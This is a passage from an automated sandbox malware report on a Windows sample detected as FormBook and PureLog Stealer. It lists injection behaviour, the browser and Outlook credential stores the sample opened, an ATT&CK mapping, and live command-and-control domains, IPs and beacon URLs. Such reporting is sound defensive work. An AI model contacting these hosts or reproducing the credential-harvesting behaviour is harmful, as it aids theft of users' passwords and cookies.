                      Source: Yara matchFile source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1567443784.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1572202797.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.file.exe.7200000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.7200000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.3e39970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1420015259.0000000007200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1417267830.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1567443784.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1572202797.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.file.exe.7200000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.7200000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.3e39970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1420015259.0000000007200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1417267830.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		412
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		1
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562914 Sample: file.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 31 www.tageting.shop 2->31 33 www.ssps.shop 2->33 35 15 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected PureLog Stealer 2->49 51 6 other signatures 2->51 10 file.exe 3 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 10->29 dropped 63 Injects a PE file into a foreign processes 10->63 14 file.exe 10->14         started        signatures6 process7 signatures8 65 Maps a DLL or memory area into another process 14->65 17 YpbicUfTwt.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 find.exe 13 17->20         started        process11 signatures12 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Modifies the context of a thread in another process (thread injection) 20->57 59 3 other signatures 20->59 23 YpbicUfTwt.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 dojodigitize.shop 15.197.142.173, 49712, 80 TANDEMUS United States 23->37 39 0be.info 173.0.157.187, 49722, 49723, 49724 SERVERS-COMUS United States 23->39 41 9 other IPs or domains 23->41 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      file.exe34%ReversingLabsByteCode-MSIL.Trojan.Leonem
                      file.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.qqc5.top/fqrq/?ynlT=Y0cHWYGzbrmggkpYjpxtSdMxfMP0Smiz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh8s29K102qUBTE3lZDmg/9I7wbokssp0voIrvrAUc2Osrw==&BZcp=FxLxsNCx3xt0%Avira URL Cloudsafe
                      http://www.ssps.shop/r99d/0%Avira URL Cloudsafe
                      http://www.tageting.shop/x43r/0%Avira URL Cloudsafe
                      http://www.fengzheng.shop/plc2/?ynlT=sjJIcM7rXxnPrFlvc0dBoChSE+wOUJkO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBQWFy+wjnVcK8AF+QDRLSO2OD8bfVRVlBcPU0ek8UWp3Qg==&BZcp=FxLxsNCx3xt0%Avira URL Cloudsafe
                      http://www.gupiao.bet/t3a1/0%Avira URL Cloudsafe
                      http://www.fengzheng.shop0%Avira URL Cloudsafe
                      http://www.tageting.shop/x43r/?BZcp=FxLxsNCx3xt&ynlT=g227vAVjmek7Ve3OhSfqnYrPqVj7dvzdLiIhaitLUQPOyze4NP6q28gxignii/rObVyldh0Z2JuPzDHM7nQjiG1l2MLTtuTBkMOIHhIRbjJQu6+Ns/S/DI47tn6Dt4shhg==0%Avira URL Cloudsafe
                      http://www.regislemberthe.online/px.js?ch=20%Avira URL Cloudsafe
                      http://www.0be.info/5m3m/0%Avira URL Cloudsafe
                      http://www.qqc5.top/fqrq/0%Avira URL Cloudsafe
                      http://www.regislemberthe.online/1y0g/?BZcp=FxLxsNCx3xt&ynlT=IEuRIrUs/61ernzQacDnFDSOdtOPzcO3DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNecVj6cupfpeXLidzN4OT675FT0gUTBFuY+WN75tNw87LNQ==0%Avira URL Cloudsafe
                      http://www.regislemberthe.online/sk-logabpstatus.php?a=alFjTmVnTnFFNS9SV3Y0RDlHR3BoMWZmc2gvcGRoa1Fye0%Avira URL Cloudsafe
                      http://www.hasan.cloud/ve8l/?BZcp=FxLxsNCx3xt&ynlT=2CD4NCzEaM98tRH2NSLAESNB0KJGqITNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX21XyN7dSlYagiwJlQTi+mtxAaezlBuk4gZte6sxMNB2v+Q==0%Avira URL Cloudsafe
                      http://www.regislemberthe.online/px.js?ch=10%Avira URL Cloudsafe
                      http://www.learnnow.info/6npp/0%Avira URL Cloudsafe
                      http://www.0be.info/5m3m/?ynlT=sewIB7u3B3NHgPpZQtRvAC2dQwElouqr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekxejaqvXrk67j38PQRuymLw6FTWN0hL2AlWAmiNidTQMGA==&BZcp=FxLxsNCx3xt0%Avira URL Cloudsafe
                      http://www.dojodigitize.shop/zxe0/?ynlT=El+NSyicP5BK/60EXWXaz7evSHJwK2e1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkBnZYNNwJ4YcRegv3/W3TWhCxoQqPNBROUFaIQ8+8cz4+g==&BZcp=FxLxsNCx3xt0%Avira URL Cloudsafe
                      http://www.masterqq.pro/vfw3/0%Avira URL Cloudsafe
                      http://www.regislemberthe.online/1y0g/0%Avira URL Cloudsafe
                      http://www.learnnow.info/6npp/?ynlT=jlm9uKJBzKMSKltuZ8hnGP24BGKDKPXveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiXWiw3/my+fKayPUfiCFUifSzt7jgsgTxNAwRGE5teyGFg==&BZcp=FxLxsNCx3xt0%Avira URL Cloudsafe
                      http://www.hasan.cloud/ve8l/0%Avira URL Cloudsafe
                      http://www.fengzheng.shop/plc2/0%Avira URL Cloudsafe
                      http://www.goldbracelet.top/eln6/?ynlT=dR5Y3aKNW3l55kULB1rxeiPlAcv1NFYB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd9wAhADTehU2x1Z0W7eNB4qt+OY8C4hNNFAeSI1HhK3X2w==&BZcp=FxLxsNCx3xt0%Avira URL Cloudsafe
                      http://www.ssps.shop/r99d/?ynlT=ksK/jUMQwoE3w4qE/G/QpncBqYFbE8pmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4iduIg7f9mhgZE4uc2OAykkUS/1hIqxxaY527NhMhRLm7btA==&BZcp=FxLxsNCx3xt0%Avira URL Cloudsafe
                      http://www.goldbracelet.top/eln6/0%Avira URL Cloudsafe
                      http://www.masterqq.pro/vfw3/?ynlT=rqg4sojPN1HzbyOgPnJNE4SyCm0Y3+McauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXfpXxUIp7SdBR5fyivcNmDQrGMikN20eFfd6B8gSgv5TSw==&BZcp=FxLxsNCx3xt0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.tageting.shop
                      		13.227.8.45
                      		truetrue
                        		unknown
                        www.masterqq.pro
                        		172.67.213.249
                        		truetrue
                          		unknown
                          www.goldbracelet.top
                          		104.21.36.239
                          		truetrue
                            		unknown
                            www.gupiao.bet
                            		13.248.169.48
                            		truetrue
                              		unknown
                              0be.info
                              		173.0.157.187
                              		truetrue
                                		unknown
                                www.regislemberthe.online
                                		208.91.197.27
                                		truetrue
                                  		unknown
                                  www.learnnow.info
                                  		199.192.23.123
                                  		truetrue
                                    		unknown
                                    qqc5.top
                                    		38.47.233.4
                                    		truetrue
                                      		unknown
                                      dojodigitize.shop
                                      		15.197.142.173
                                      		truetrue
                                        		unknown
                                        www.honk.city
                                        		199.59.243.227
                                        		truetrue
                                          		unknown
                                          www.ssps.shop
                                          		13.248.169.48
                                          		truetrue
                                            		unknown
                                            www.hasan.cloud
                                            		13.248.169.48
                                            		truetrue
                                              		unknown
                                              www.fengzheng.shop
                                              		185.26.237.170
                                              		truetrue
                                                		unknown
                                                www.0be.info
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.ulojenukw.shop
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.dojodigitize.shop
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.qqc5.top
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.qqc5.top/fqrq/?ynlT=Y0cHWYGzbrmggkpYjpxtSdMxfMP0Smiz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh8s29K102qUBTE3lZDmg/9I7wbokssp0voIrvrAUc2Osrw==&BZcp=FxLxsNCx3xttrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.gupiao.bet/t3a1/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.tageting.shop/x43r/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ssps.shop/r99d/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.0be.info/5m3m/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fengzheng.shop/plc2/?ynlT=sjJIcM7rXxnPrFlvc0dBoChSE+wOUJkO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBQWFy+wjnVcK8AF+QDRLSO2OD8bfVRVlBcPU0ek8UWp3Qg==&BZcp=FxLxsNCx3xttrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.qqc5.top/fqrq/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.tageting.shop/x43r/?BZcp=FxLxsNCx3xt&ynlT=g227vAVjmek7Ve3OhSfqnYrPqVj7dvzdLiIhaitLUQPOyze4NP6q28gxignii/rObVyldh0Z2JuPzDHM7nQjiG1l2MLTtuTBkMOIHhIRbjJQu6+Ns/S/DI47tn6Dt4shhg==true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.regislemberthe.online/1y0g/?BZcp=FxLxsNCx3xt&ynlT=IEuRIrUs/61ernzQacDnFDSOdtOPzcO3DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNecVj6cupfpeXLidzN4OT675FT0gUTBFuY+WN75tNw87LNQ==true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.learnnow.info/6npp/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.hasan.cloud/ve8l/?BZcp=FxLxsNCx3xt&ynlT=2CD4NCzEaM98tRH2NSLAESNB0KJGqITNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX21XyN7dSlYagiwJlQTi+mtxAaezlBuk4gZte6sxMNB2v+Q==true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.0be.info/5m3m/?ynlT=sewIB7u3B3NHgPpZQtRvAC2dQwElouqr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekxejaqvXrk67j38PQRuymLw6FTWN0hL2AlWAmiNidTQMGA==&BZcp=FxLxsNCx3xttrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.regislemberthe.online/1y0g/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.dojodigitize.shop/zxe0/?ynlT=El+NSyicP5BK/60EXWXaz7evSHJwK2e1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkBnZYNNwJ4YcRegv3/W3TWhCxoQqPNBROUFaIQ8+8cz4+g==&BZcp=FxLxsNCx3xttrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.masterqq.pro/vfw3/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.learnnow.info/6npp/?ynlT=jlm9uKJBzKMSKltuZ8hnGP24BGKDKPXveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiXWiw3/my+fKayPUfiCFUifSzt7jgsgTxNAwRGE5teyGFg==&BZcp=FxLxsNCx3xttrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.hasan.cloud/ve8l/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fengzheng.shop/plc2/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ssps.shop/r99d/?ynlT=ksK/jUMQwoE3w4qE/G/QpncBqYFbE8pmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4iduIg7f9mhgZE4uc2OAykkUS/1hIqxxaY527NhMhRLm7btA==&BZcp=FxLxsNCx3xttrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.goldbracelet.top/eln6/?ynlT=dR5Y3aKNW3l55kULB1rxeiPlAcv1NFYB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd9wAhADTehU2x1Z0W7eNB4qt+OY8C4hNNFAeSI1HhK3X2w==&BZcp=FxLxsNCx3xttrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.masterqq.pro/vfw3/?ynlT=rqg4sojPN1HzbyOgPnJNE4SyCm0Y3+McauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXfpXxUIp7SdBR5fyivcNmDQrGMikN20eFfd6B8gSgv5TSw==&BZcp=FxLxsNCx3xttrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.goldbracelet.top/eln6/true
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://duckduckgo.com/chrome_newtabfind.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fengzheng.shopYpbicUfTwt.exe, 00000007.00000002.3865989919.0000000005858000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://dts.gnpge.comYpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icofind.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.regislemberthe.online/px.js?ch=2find.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.regislemberthe.online/px.js?ch=1find.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.ecosia.org/newtab/find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.regislemberthe.online/sk-logabpstatus.php?a=alFjTmVnTnFFNS9SV3Y0RDlHR3BoMWZmc2gvcGRoa1Fyefind.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://imweb.me/loginfind.exe, 00000005.00000002.3865918446.0000000003F3C000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000003DDC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ac.ecosia.org/autocomplete?q=find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.google.comfind.exe, 00000005.00000002.3865918446.0000000004A3A000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000005.00000002.3867588890.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.00000000048DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfind.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                38.47.233.4
                                                                                		qqc5.topUnited States
                                                                                		174COGENT-174UStrue
                                                                                13.248.169.48
                                                                                		www.gupiao.betUnited States
                                                                                		16509AMAZON-02UStrue
                                                                                104.21.36.239
                                                                                		www.goldbracelet.topUnited States
                                                                                		13335CLOUDFLARENETUStrue
                                                                                172.67.213.249
                                                                                		www.masterqq.proUnited States
                                                                                		13335CLOUDFLARENETUStrue
                                                                                199.192.23.123
                                                                                		www.learnnow.infoUnited States
                                                                                		22612NAMECHEAP-NETUStrue
                                                                                15.197.142.173
                                                                                		dojodigitize.shopUnited States
                                                                                		7430TANDEMUStrue
                                                                                13.227.8.45
                                                                                		www.tageting.shopUnited States
                                                                                		16509AMAZON-02UStrue
                                                                                199.59.243.227
                                                                                		www.honk.cityUnited States
                                                                                		395082BODIS-NJUStrue
                                                                                208.91.197.27
                                                                                		www.regislemberthe.onlineVirgin Islands (BRITISH)
                                                                                		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                173.0.157.187
                                                                                		0be.infoUnited States
                                                                                		7979SERVERS-COMUStrue
                                                                                185.26.237.170
                                                                                		www.fengzheng.shopEuropean Union
                                                                                		57169EDIS-AS-EUATtrue

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1562914
                                                                                Start date and time:2024-11-26 09:26:09 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 10m 54s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:11
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:2
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:file.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@17/11
                                                                                EGA Information:
                                                                                • Successful, ratio: 75%
                                                                                HCA Information:
                                                                                • Successful, ratio: 96%
                                                                                • Number of executed functions: 103
                                                                                • Number of non-executed functions: 293
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target YpbicUfTwt.exe, PID 5348 because it is empty
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • VT rate limit hit for: file.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                03:27:03API Interceptor2x Sleep call for process: file.exe modified
                                                                                03:27:56API Interceptor10492276x Sleep call for process: find.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                13.248.169.48DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.krshop.shop/grhe/
                                                                                Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                • www.a1shop.shop/5cnx/
                                                                                ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • www.tals.xyz/tj5o/
                                                                                santi.exeGet hashmaliciousFormBookBrowse
                                                                                • www.lirio.shop/qp0h/
                                                                                PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                • www.optimismbank.xyz/98j3/
